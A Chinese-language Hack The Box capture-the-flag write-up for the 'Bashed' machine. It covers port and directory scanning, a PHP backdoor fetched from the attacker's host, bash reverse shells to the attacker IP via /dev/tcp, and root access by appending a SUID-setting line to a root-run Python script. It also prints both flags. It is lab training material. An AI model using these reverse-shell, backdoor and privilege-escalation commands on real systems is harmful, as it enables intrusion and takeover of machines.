Bashed-htb-writeup

0x00 靶场技能介绍

章节技能:目录扫描、文件上传、sudo、py脚本分析、suid

参考链接:无

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.68

2、探测下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.68                  
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 23:11 CST
Warning: 10.10.10.68 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.68
Host is up (0.32s latency).
Not shown: 64287 closed tcp ports (reset), 1247 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 43.88 seconds
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports1 10.10.10.68 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 23:13 CST
Warning: 10.10.10.68 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.68
Host is up (0.43s latency).
All 65535 scanned ports on 10.10.10.68 are in ignored states.
Not shown: 65444 open|filtered udp ports (no-response), 91 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 78.15 seconds
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80 --min-rate=10000 10.10.10.68 -sV -sC
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 23:26 CST
Nmap scan report for 10.10.10.68
Host is up (1.2s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.73 seconds

3、只有1个端口开放,那就查看下网站信息吧

http://10.10.10.68/

1
phpbash对pentesting有很大帮助。我已经在多个不同的服务器上测试过了,它非常有用。实际上我是在这个服务器上开发的!

http://10.10.10.68/single.html

1
phpbash对pentesting有很大帮助。我已经在多个不同的服务器上测试过了,它非常有用。实际上我是在这个服务器上开发的!

https://github.com/Arrexel/phpbash

4、这里的截图显示是一个shell的功能界面,再查看下这个github的内容

https://github.com/Arrexel/phpbash

1
2
3
phpbash.min.php

phpbash.php

5、简单目录扫描一下吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali㉿offsec)-[~/Desktop]
└─$ dirsearch -u http://10.10.10.68/  -e .php                                                                                          

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: GET | Threads: 25 | Wordlist size: 9411

Output File: /home/kali/Desktop/reports/http_10.10.10.68/__24-05-19_23-34-49.txt

Target: http://10.10.10.68/

[23:34:49] Starting: 
[23:34:53] 301 -  308B  - /php  ->  http://10.10.10.68/php/
[23:36:12] 200 -    0B  - /config.php                                       
[23:36:18] 301 -  308B  - /css  ->  http://10.10.10.68/css/                 
[23:36:22] 200 -  479B  - /dev/                                             
[23:36:22] 301 -  308B  - /dev  ->  http://10.10.10.68/dev/                 
[23:36:37] 301 -  310B  - /fonts  ->  http://10.10.10.68/fonts/             
[23:36:43] 200 -  513B  - /images/                                          
[23:36:43] 301 -  311B  - /images  ->  http://10.10.10.68/images/           
[23:36:49] 301 -  307B  - /js  ->  http://10.10.10.68/js/                   
[23:36:49] 200 -  660B  - /js/                                              
[23:37:13] 200 -  454B  - /php/                                             
[23:37:34] 403 -  300B  - /server-status/                                   
[23:37:34] 403 -  299B  - /server-status                                    
[23:37:53] 200 -   14B  - /uploads/                                         
[23:37:53] 301 -  312B  - /uploads  ->  http://10.10.10.68/uploads/         
                                                                             
Task Completed

6、发现一个dev的目录,访问下看看

http://10.10.10.68/dev/

7、简单 尝试,发现无法通过bash反弹过来shell,那只能上次NC试试了,结果,默认的nc 没有-e 参数,看来不行。

1
2
3
4
5
6
7
8
9
10
www-data@bashed
:/var/www/html/dev# wget http://10.10.14.45/qsd-php-backdoor.php

--2024-05-19 00:55:31-- http://10.10.14.45/qsd-php-backdoor.php
Connecting to 10.10.14.45:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13585 (13K) [application/octet-stream]
qsd-php-backdoor.php: Permission denied

Cannot write to 'qsd-php-backdoor.php' (Success).

8、在枚举尝试中,发现我们对 uploads 目录有写入权限,下面我们把WEBshell写入到这个目录里

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
www-data@bashed
:/var/www/html# cd uploads

www-data@bashed
:/var/www/html/uploads# ls -la

total 12
drwxrwxrwx 2 root root 4096 Jun 2 2022 .
drw-r-xr-x 10 root root 4096 Jun 2 2022 ..
-rwxrwxrwx 1 root root 14 Dec 4 2017 index.html
www-data@bashed
:/var/www/html/uploads# wget http://10.10.14.45/qsd-php-backdoor.php

--2024-05-19 01:00:30-- http://10.10.14.45/qsd-php-backdoor.php
Connecting to 10.10.14.45:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13585 (13K) [application/octet-stream]
Saving to: 'qsd-php-backdoor.php'

0K .......... ... 100% 33.9K=0.4s

2024-05-19 01:00:31 (33.9 KB/s) - 'qsd-php-backdoor.php' saved [13585/13585]

www-data@bashed
:/var/www/html/uploads# ls

index.html
qsd-php-backdoor.php

9、这里就直接尝试反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
http://10.10.10.68/uploads/qsd-php-backdoor.php

bash -c "bash -i >& /dev/tcp/10.10.14.45/443 0>&1"

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443                                                                                            
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.68] 34302
bash: cannot set terminal process group (821): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bashed:/var/www/html/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bashed:/var/www/html/uploads$

10、然后就获取到第一个flag信息了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
www-data@bashed:/var/www$ ls -la
ls -la
total 12
drwxr-xr-x  3 root root 4096 Jun  2  2022 .
drwxr-xr-x 12 root root 4096 Jun  2  2022 ..
drw-r-xr-x 10 root root 4096 Jun  2  2022 html
www-data@bashed:/var/www$ ls -la /home
ls -la /home
total 16
drwxr-xr-x  4 root          root          4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Jun  2  2022 ..
drwxr-xr-x  4 arrexel       arrexel       4096 Jun  2  2022 arrexel
drwxr-xr-x  3 scriptmanager scriptmanager 4096 Dec  4  2017 scriptmanager
www-data@bashed:/var/www$ 

www-data@bashed:/var/www$ cd /home/arrexel
cd /home/arrexel
www-data@bashed:/home/arrexel$ ls -la
ls -la
total 32
drwxr-xr-x 4 arrexel arrexel 4096 Jun  2  2022 .
drwxr-xr-x 4 root    root    4096 Dec  4  2017 ..
lrwxrwxrwx 1 root    root       9 Jun  2  2022 .bash_history -> /dev/null
-rw-r--r-- 1 arrexel arrexel  220 Dec  4  2017 .bash_logout
-rw-r--r-- 1 arrexel arrexel 3786 Dec  4  2017 .bashrc
drwx------ 2 arrexel arrexel 4096 Dec  4  2017 .cache
drwxrwxr-x 2 arrexel arrexel 4096 Dec  4  2017 .nano
-rw-r--r-- 1 arrexel arrexel  655 Dec  4  2017 .profile
-rw-r--r-- 1 arrexel arrexel    0 Dec  4  2017 .sudo_as_admin_successful
-r--r--r-- 1 arrexel arrexel   33 May 18 23:31 user.txt
www-data@bashed:/home/arrexel$ cat user.txt
cat user.txt
daa5414199b793a3305f56de63877587
www-data@bashed:/home/arrexel$

0x02 系统权限获取

11、提权这里,是直接使用 linpeas.sh 脚本进行信息枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
www-data@bashed:/var/www/html/uploads$ wget http://10.10.14.45/linpeas.sh
wget http://10.10.14.45/linpeas.sh
--2024-05-19 01:17:18--  http://10.10.14.45/linpeas.sh
Connecting to 10.10.14.45:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847920 (828K) [text/x-sh]
Saving to: 'linpeas.sh'

     0K .......... .......... .......... .......... ..........  6% 29.8K 26s
    50K .......... .......... .......... .......... .......... 12% 44.6K 20s
   100K .......... .......... .......... .......... .......... 18% 74.1K 16s
   150K .......... .......... .......... .......... .......... 24% 66.6K 13s
   200K .......... .......... .......... .......... .......... 30% 56.0K 12s
   250K .......... .......... .......... .......... .......... 36%  114K 10s
   300K .......... .......... .......... .......... .......... 42% 96.1K 8s
   350K .......... .......... .......... .......... .......... 48% 98.7K 7s
   400K .......... .......... .......... .......... .......... 54%  124K 6s
   450K .......... .......... .......... .......... .......... 60%  105K 5s
   500K .......... .......... .......... .......... .......... 66% 1.26M 4s
   550K .......... .......... .......... .......... .......... 72%  131K 3s
   600K .......... .......... .......... .......... .......... 78% 1.39M 2s
   650K .......... .......... .......... .......... .......... 84%  173K 2s
   700K .......... .......... .......... .......... .......... 90% 2.28M 1s
   750K .......... .......... .......... .......... .......... 96%  164K 0s
   800K .......... .......... ........                        100% 7.70M=8.5s

2024-05-19 01:17:28 (97.0 KB/s) - 'linpeas.sh' saved [847920/847920]

www-data@bashed:/var/www/html/uploads$ ls -la
ls -la
total 860
drwxrwxrwx  2 root     root       4096 May 19 01:17 .
drw-r-xr-x 10 root     root       4096 Jun  2  2022 ..
-rwxrwxrwx  1 root     root         14 Dec  4  2017 index.html
-rw-r--r--  1 www-data www-data 847920 Dec 27 22:40 linpeas.sh
-rw-r--r--  1 www-data www-data  13585 Nov 20  2021 qsd-php-backdoor.php
www-data@bashed:/var/www/html/uploads$ 

www-data@bashed:/var/www/html/uploads$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@bashed:/var/www/html/uploads$ ./linpeas.sh

OS: Linux version 4.4.0-62-generic (buildd@lcy01-30) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017

https://github.com/jondonas/linux-exploit-suggester-2

  [1] af_packet

      CVE-2016-8655
      Source: http://www.exploit-db.com/exploits/40871
  [2] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [3] get_rekt
      CVE-2017-16695
      Source: http://www.exploit-db.com/exploits/45010


╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid         

Matching Defaults entries for www-data on bashed:                                        

    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

uid=1000(arrexel) gid=1000(arrexel) groups=1000(arrexel),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)

/home/arrexel/.bash_history

12、这里我们发现,我们可以无需密码就执行 scriptmanager 用户的权限,下面我使用sudo 获取一下反弹shell吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
www-data@bashed:/var/www/html/uploads$ sudo -u scriptmanager bash -c "bash -i >& /dev/tcp/10.10.14.45/4444 0>&1"
<manager bash -c "bash -i >& /dev/tcp/10.10.14.45/4444 0>&1"                 

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 4444

listening on [any] 4444 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.68] 60220
bash: cannot set terminal process group (821): Inappropriate ioctl for device
bash: no job control in this shell
scriptmanager@bashed:/var/www/html/uploads$ id
id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
scriptmanager@bashed:/var/www/html/uploads$

13、前几天通过问答社区,了解到还有一个这个工具,想着就下载下来看看,结果运行下来,好像没啥大用,没linpeas好用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
scriptmanager@bashed:~$ wget http://10.10.14.45/lse.sh
wget http://10.10.14.45/lse.sh
--2024-05-19 01:53:48--  http://10.10.14.45/lse.sh
Connecting to 10.10.14.45:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 48875 (48K) [text/x-sh]
Saving to: 'lse.sh'

     0K .......... .......... .......... .......... .......   100% 58.5K=0.8s

2024-05-19 01:53:50 (58.5 KB/s) - 'lse.sh' saved [48875/48875]

scriptmanager@bashed:~$ chmod +x lse.sh
chmod +x lse.sh
scriptmanager@bashed:~$ ./lse.sh
---
If you know the current user password, write it here to check sudo privileges: 
---
                                                                                                                                                                                        
 LSE Version: 4.14nw 
 
        User: scriptmanager
     User ID: 1001
    Password: none
        Home: /home/scriptmanager
        Path: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
       umask: 0022

    Hostname: bashed
       Linux: 4.4.0-62-generic
Distribution: Ubuntu 16.04.2 LTS
Architecture: x86_64

=====================( Current Output Verbosity Level: 0 )======================
===============================================================( humanity )=====
[!] nowar0 Should we question autocrats and their "military operations"?... yes!
---
                                      NO   
                                      WAR  
---
==================================================================( users )=====
[i] usr000 Current user groups............................................. yes!
[*] usr010 Is current user in an administrative group?..................... nope
[*] usr020 Are there other users in administrative groups?................. yes!
[*] usr030 Other users with shell.......................................... yes!                                                                                                        
[i] usr040 Environment information......................................... skip
[i] usr050 Groups for other users.......................................... skip                                                                                                        
[i] usr060 Other users..................................................... skip                                                                                                        
[*] usr070 PATH variables defined inside /etc.............................. yes!                                                                                                        
[!] usr080 Is '.' in a PATH variable defined inside /etc?.................. nope                                                                                                        
===================================================================( sudo )=====
[!] sud000 Can we sudo without a password?................................. nope
[!] sud010 Can we list sudo commands without a password?................... nope
[*] sud040 Can we read sudoers files?...................................... nope
[*] sud050 Do we know if any other users used sudo?........................ yes!
============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. yes!                                                                                                        
[*] fst010 Binaries with setuid bit........................................ yes!
[!] fst020 Uncommon setuid binaries........................................ yes!                                                                                                        
---
/usr/bin/vmware-user-suid-wrapper
---
[!] fst030 Can we write to any setuid binary?.............................. nope
[*] fst040 Binaries with setgid bit........................................ skip
[!] fst050 Uncommon setgid binaries........................................ skip                                                                                                        
[!] fst060 Can we write to any setgid binary?.............................. skip                                                                                                        
[*] fst070 Can we read /root?.............................................. nope                                                                                                        
[*] fst080 Can we read subdirectories under /home?......................... yes!
[*] fst090 SSH files in home directories................................... nope
[*] fst100 Useful binaries................................................. yes!
[*] fst110 Other interesting files in home directories..................... nope
[!] fst120 Are there any credentials in fstab/mtab?........................ nope
[*] fst130 Does 'scriptmanager' have mail?................................. nope
[!] fst140 Can we access other users mail?................................. nope
[*] fst150 Looking for GIT/SVN repositories................................ nope                                                                                                        
[!] fst160 Can we write to critical files?................................. nope
[!] fst170 Can we write to critical directories?........................... nope
[!] fst180 Can we write to directories from PATH defined in /etc?.......... nope
[!] fst190 Can we read any backup?......................................... nope
[!] fst200 Are there possible credentials in any shell history file?....... nope
[!] fst210 Are there NFS exports with 'no_root_squash' option?............. nope
[*] fst220 Are there NFS exports with 'no_all_squash' option?.............. nope
[i] fst500 Files owned by user 'scriptmanager'............................. skip
[i] fst510 SSH files anywhere.............................................. skip                                                                                                        
[i] fst520 Check hosts.equiv file and its contents......................... skip                                                                                                        
[i] fst530 List NFS server shares.......................................... skip                                                                                                        
[i] fst540 Dump fstab file................................................. skip                                                                                                        
=================================================================( system )=====                                                                                                        
[i] sys000 Who is logged in................................................ skip
[i] sys010 Last logged in users............................................ skip                                                                                                        
[!] sys020 Does the /etc/passwd have hashes?............................... nope                                                                                                        
[!] sys022 Does the /etc/group have hashes?................................ nope
[!] sys030 Can we read shadow files?....................................... nope
[*] sys040 Check for other superuser accounts.............................. nope
[*] sys050 Can root user log in via SSH?................................... nope
[i] sys060 List available shells........................................... skip                                                                                                        
[i] sys070 System umask in /etc/login.defs................................. skip                                                                                                        
[i] sys080 System password policies in /etc/login.defs..................... skip                                                                                                        
===============================================================( security )=====                                                                                                        
[*] sec000 Is SELinux present?............................................. nope
[*] sec010 List files with capabilities.................................... yes!                                                                                                        
[!] sec020 Can we write to a binary with caps?............................. nope
[!] sec030 Do we have all caps in any binary?.............................. nope
[*] sec040 Users with associated capabilities.............................. nope
[!] sec050 Does current user have capabilities?............................ skip
[!] sec060 Can we read the auditd log?..................................... nope                                                                                                        
========================================================( recurrent tasks )=====
[*] ret000 User crontab.................................................... nope
[!] ret010 Cron tasks writable by user..................................... nope
[*] ret020 Cron jobs....................................................... yes!                                                                                                        
[*] ret030 Can we read user crontabs....................................... nope
[*] ret040 Can we list other user cron tasks?.............................. nope
[*] ret050 Can we write to any paths present in cron jobs.................. nope
[!] ret060 Can we write to executable paths present in cron jobs........... skip
[i] ret400 Cron files...................................................... skip                                                                                                        
[*] ret500 User systemd timers............................................. nope                                                                                                        
[!] ret510 Can we write in any system timer?............................... nope
[i] ret900 Systemd timers.................................................. skip
================================================================( network )=====                                                                                                        
[*] net000 Services listening only on localhost............................ nope
[!] net010 Can we sniff traffic with tcpdump?.............................. nope                                                                                                        
[i] net500 NIC and IP information.......................................... skip
[i] net510 Routing table................................................... skip                                                                                                        
[i] net520 ARP table....................................................... skip                                                                                                        
[i] net530 Nameservers..................................................... skip                                                                                                        
[i] net540 Systemd Nameservers............................................. skip                                                                                                        
[i] net550 Listening TCP................................................... skip                                                                                                        
[i] net560 Listening UDP................................................... skip                                                                                                        
===============================================================( services )=====                                                                                                        
[!] srv000 Can we write in service files?.................................. nope
[!] srv010 Can we write in binaries executed by services?.................. nope
[*] srv020 Files in /etc/init.d/ not belonging to root..................... nope
[*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope
[*] srv040 Upstart files not belonging to root............................. nope
[*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope
[i] srv400 Contents of /etc/inetd.conf..................................... skip                                                                                                        
[i] srv410 Contents of /etc/xinetd.conf.................................... skip                                                                                                        
[i] srv420 List /etc/xinetd.d if used...................................... skip                                                                                                        
[i] srv430 List /etc/init.d/ permissions................................... skip                                                                                                        
[i] srv440 List /etc/rc.d/init.d permissions............................... skip                                                                                                        
[i] srv450 List /usr/local/etc/rc.d permissions............................ skip                                                                                                        
[i] srv460 List /etc/init/ permissions..................................... skip                                                                                                        
[!] srv500 Can we write in systemd service files?.......................... nope                                                                                                        
[!] srv510 Can we write in binaries executed by systemd services?.......... nope
[*] srv520 Systemd files not belonging to root............................. nope
[i] srv900 Systemd config files permissions................................ skip                                                                                                        
===============================================================( software )=====                                                                                                        
[!] sof000 Can we connect to MySQL with root/root credentials?............. nope
[!] sof010 Can we connect to MySQL as root without password?............... nope
[!] sof015 Are there credentials in mysql_history file?.................... nope
[!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope
[!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope
[*] sof030 Installed apache modules........................................ yes!
[!] sof040 Found any .htpasswd files?...................................... nope
[!] sof050 Are there private keys in ssh-agent?............................ nope                                                                                                        
[!] sof060 Are there gpg keys cached in gpg-agent?......................... nope
[!] sof070 Can we write to a ssh-agent socket?............................. nope
[!] sof080 Can we write to a gpg-agent socket?............................. nope
[!] sof090 Found any keepass database files?............................... nope
[!] sof100 Found any 'pass' store directories?............................. nope
[!] sof110 Are there any tmux sessions available?.......................... nope
[*] sof120 Are there any tmux sessions from other users?................... nope
[!] sof130 Can we write to tmux session sockets from other users?.......... nope
[!] sof140 Are any screen sessions available?.............................. nope
[*] sof150 Are there any screen sessions from other users?................. nope
[!] sof160 Can we write to screen session sockets from other users?........ nope
[*] sof170 Can we access MongoDB databases without credentials?............ nope
[!] sof180 Can we access any Kerberos credentials?......................... nope
[i] sof500 Sudo version.................................................... skip
[i] sof510 MySQL version................................................... skip                                                                                                        
[i] sof520 Postgres version................................................ skip                                                                                                        
[i] sof530 Apache version.................................................. skip                                                                                                        
[i] sof540 Tmux version.................................................... skip                                                                                                        
[i] sof550 Screen version.................................................. skip                                                                                                        
=============================================================( containers )=====                                                                                                        
[*] ctn000 Are we in a docker container?................................... nope                                                                                                        
[*] ctn010 Is docker available?............................................ nope
[!] ctn020 Is the user a member of the 'docker' group?..................... nope
[*] ctn200 Are we in a lxc container?...................................... nope
[!] ctn210 Is the user a member of any lxc/lxd group?...................... nope
==============================================================( processes )=====
[i] pro000 Waiting for the process monitor to finish....................... yes!                                                                                                        
[i] pro001 Retrieving process binaries..................................... yes!
[i] pro002 Retrieving process users........................................ yes!
[!] pro010 Can we write in any process binary?............................. nope
[*] pro020 Processes running with root permissions......................... yes!
[*] pro030 Processes running by non-root users with shell.................. yes!                                                                                                        
[i] pro500 Running processes............................................... skip
[i] pro510 Running process binaries and permissions........................ skip                                                                                                        
===================================================================( CVEs )=====                                                                                                        
  In order to test for CVEs, download lse.sh from the GitHub releases page.
  Alternatively, build lse_cve.sh using tools/package_cvs_into_lse.sh from the
 repository.
==================================( FINISHED )==================================

14、通过枚举,发现根目录下有个脚本目录,里面有一个Python的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
scriptmanager@bashed:~$ cd /
cd /
scriptmanager@bashed:/$ ls -la
ls -la
total 92
drwxr-xr-x  23 root          root           4096 Jun  2  2022 .
drwxr-xr-x  23 root          root           4096 Jun  2  2022 ..
-rw-------   1 root          root            174 Jun 14  2022 .bash_history
drwxr-xr-x   2 root          root           4096 Jun  2  2022 bin
drwxr-xr-x   3 root          root           4096 Jun  2  2022 boot
drwxr-xr-x  19 root          root           4140 May 18 23:30 dev
drwxr-xr-x  89 root          root           4096 Jun  2  2022 etc
drwxr-xr-x   4 root          root           4096 Dec  4  2017 home
lrwxrwxrwx   1 root          root             32 Dec  4  2017 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x  19 root          root           4096 Dec  4  2017 lib
drwxr-xr-x   2 root          root           4096 Jun  2  2022 lib64
drwx------   2 root          root          16384 Dec  4  2017 lost+found
drwxr-xr-x   4 root          root           4096 Dec  4  2017 media
drwxr-xr-x   2 root          root           4096 Jun  2  2022 mnt
drwxr-xr-x   2 root          root           4096 Dec  4  2017 opt
dr-xr-xr-x 174 root          root              0 May 18 23:30 proc
drwx------   3 root          root           4096 May 18 23:31 root
drwxr-xr-x  18 root          root            500 May 18 23:30 run
drwxr-xr-x   2 root          root           4096 Dec  4  2017 sbin
drwxrwxr--   2 scriptmanager scriptmanager  4096 Jun  2  2022 scripts
drwxr-xr-x   2 root          root           4096 Feb 15  2017 srv
dr-xr-xr-x  13 root          root              0 May 18 23:30 sys
drwxrwxrwt  10 root          root           4096 May 19 02:05 tmp
drwxr-xr-x  10 root          root           4096 Dec  4  2017 usr
drwxr-xr-x  12 root          root           4096 Jun  2  2022 var
lrwxrwxrwx   1 root          root             29 Dec  4  2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic
scriptmanager@bashed:/$ cd scripts
cd scripts
scriptmanager@bashed:/scripts$ ls -la
ls -la
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Jun  2  2022 .
drwxr-xr-x 23 root          root          4096 Jun  2  2022 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 May 19 02:05 test.txt
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt
testing 123!

15、这里直接写入到脚本里一行代码进行提权

1
2
3
4
5
6
7
8
9
10
11
12
scriptmanager@bashed:/scripts$ echo "import os;os.system('chmod u+s /bin/bash')" >> ./test.py
<ts$ echo "import os;os.system('chmod u+s /bin/bash')" >> ./test.py          
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
import os;os.system('chmod u+s /bin/bash')
scriptmanager@bashed:/scripts$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-xr-x 1 root root 1037528 Jun 24  2016 /bin/bash
scriptmanager@bashed:/scripts$

16、获取最终flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
scriptmanager@bashed:/scripts$ bash -p
bash -p
id
uid=1001(scriptmanager) gid=1001(scriptmanager) euid=0(root) groups=1001(scriptmanager)
cd /root
ls -la
total 28
drwx------  3 root root 4096 May 18 23:31 .
drwxr-xr-x 23 root root 4096 Jun  2  2022 ..
lrwxrwxrwx  1 root root    9 Jun  2  2022 .bash_history -> /dev/null
-rw-r--r--  1 root root 3121 Dec  4  2017 .bashrc
drwxr-xr-x  2 root root 4096 Jun  2  2022 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Dec  4  2017 .selected_editor
-r--------  1 root root   33 May 18 23:31 root.txt
cat root.txt
3383e7ca075694896c2fe89f5bb20946

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/118

打靶记
#shooting-range
Bashed-htb-writeup
https://sh1yan.top/2024/05/20/Bashed-htb-writeup/
作者
shiyan
发布于
2024年5月20日
许可协议